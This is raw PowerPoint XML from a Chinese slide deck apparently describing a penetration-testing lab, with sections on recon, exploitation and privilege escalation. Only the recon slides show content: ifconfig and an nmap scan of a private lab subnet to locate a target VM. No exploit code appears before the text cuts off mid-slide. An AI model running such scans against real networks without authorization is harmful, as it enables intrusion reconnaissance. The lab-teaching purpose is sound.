              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="838" r="60362"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-37083" y="-7039"/>
            <a:ext cx="6506204" cy="6865039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2153500" y="4501568"/>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6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目  录</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2099311" y="5446665"/>
            <a:ext cx="2265680" cy="7386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solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Content</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="11128784" y="5502874"/>
            <a:ext cx="123373" cy="522514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BD9F68"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10822285" y="6042728"/>
            <a:ext cx="777591" cy="25423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pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>S J T U</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="组合 82"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7048665" y="1500799"/>
            <a:ext cx="4463718" cy="760640"/>
            <a:chOff x="5345475" y="1180600"/>
            <a:chExt cx="4463718" cy="760640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="矩形 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6277020" y="1221240"/>
              <a:ext cx="3532173" cy="720000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="30000">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="5000"/>
                    <a:lumOff val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFF9F9">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="FFFCFC">
                    <a:alpha val="70000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="58000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="90000"/>
                  </a:schemeClr>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solidFill>
                    <a:srgbClr val="5391D9"/>
                  </a:solidFill>
                  <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>信息收集</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="85" name="组合 84"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5345475" y="1180600"/>
              <a:ext cx="720000" cy="720000"/>
              <a:chOff x="5412150" y="1180600"/>
              <a:chExt cx="720000" cy="720000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86" name="矩形 85"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5412150" y="1180600"/>
                <a:ext cx="720000" cy="720000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="2C57A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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                    <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                  <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="87" name="矩形 86"/>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9" name="组合 98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7049426" y="2772513"/>
            <a:ext cx="4462448" cy="720000"/>
            <a:chOff x="5345475" y="1180600"/>
            <a:chExt cx="4462448" cy="720000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="矩形 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275750" y="1180600"/>
              <a:ext cx="3532173" cy="720000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="30000">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="5000"/>
                    <a:lumOff val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFF9F9">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="FFFCFC">
                    <a:alpha val="70000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="58000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="90000"/>
                  </a:schemeClr>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solidFill>
                    <a:srgbClr val="5391D9"/>
                  </a:solidFill>
                  <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>漏洞利用</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="101" name="组合 100"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5345475" y="1180600"/>
              <a:ext cx="720000" cy="720000"/>
              <a:chOff x="5412150" y="1180600"/>
              <a:chExt cx="720000" cy="720000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="102" name="矩形 101"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5412150" y="1180600"/>
                <a:ext cx="720000" cy="720000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="2C57A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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                    <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                  <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="103" name="矩形 102"/>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4" name="组合 103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7048665" y="4044226"/>
            <a:ext cx="4462448" cy="720000"/>
            <a:chOff x="5345475" y="1180600"/>
            <a:chExt cx="4462448" cy="720000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="矩形 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275750" y="1180600"/>
              <a:ext cx="3532173" cy="720000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="30000">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="5000"/>
                    <a:lumOff val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFF9F9">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="84000">
                  <a:srgbClr val="FFFCFC">
                    <a:alpha val="70000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="58000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="90000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="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solidFill>
                    <a:srgbClr val="5391D9"/>
                  </a:solidFill>
                  <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>提权</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="106" name="组合 105"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5345475" y="1180600"/>
              <a:ext cx="720000" cy="720000"/>
              <a:chOff x="5412150" y="1180600"/>
              <a:chExt cx="720000" cy="720000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="107" name="矩形 106"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5412150" y="1180600"/>
                <a:ext cx="720000" cy="720000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="2C57A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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                    <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                  <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="108" name="矩形 107"/>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10"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3835400"/>
            <a:ext cx="12192000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="BD9F68"/>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t="34847" b="23829"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-18081"/>
            <a:ext cx="12192000" cy="3778644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="3760562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="063A65">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13110" y="3510280"/>
            <a:ext cx="2101020" cy="2015089"/>
            <a:chOff x="1048224" y="3047028"/>
            <a:chExt cx="2862843" cy="2991505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1048225" y="3047028"/>
              <a:ext cx="2862842" cy="289454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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BD9F68"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2431166" y="4558633"/>
              <a:ext cx="96958" cy="2862841"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BD9F68"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="BD9F6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D9F68"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9143026" y="1072243"/>
            <a:ext cx="2667000" cy="522514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BD9F68"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图形 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500" y="516483"/>
            <a:ext cx="2526948" cy="664363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879055" y="3749229"/>
            <a:ext cx="1569127" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BD9F68"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498645" y="4485755"/>
            <a:ext cx="5411787" cy="664210"/>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lang="fr-FR" sz="5400" kern="1200" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息收集</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获取靶机地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE47C1F-6B5B-4A9B-8AA9-C7AD6A903412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6733061" y="1719779"/>
            <a:ext cx="4568455" cy="4141455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="2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确认靶机和攻击机在同一个局域网内</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="2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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查询到攻击机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>192.168.194.134</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="2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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 192.168.194.0/24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指令查询同一网段的指令</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285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="2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确认靶机地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>192.168.194.146</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="扫描靶机1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24ED5B57-9DDF-4416-9477-A23935A58413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="74" r="9631" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766454" y="1424763"/>
            <a:ext cx="5629255" cy="4731488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="圆角矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9944C81F-060E-4DC2-9CA0-3B81BABA0302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1103806" y="1657261"/>
            <a:ext cx="1979635" cy="17153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26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0205CEE-61CD-40B6-AA97-5D04AC4D09D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766454" y="4850574"/>
            <a:ext cx="3497202" cy="118871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858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查看端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="扫描靶机2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3B63D1-9552-45B9-A112-B7E8C782C398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
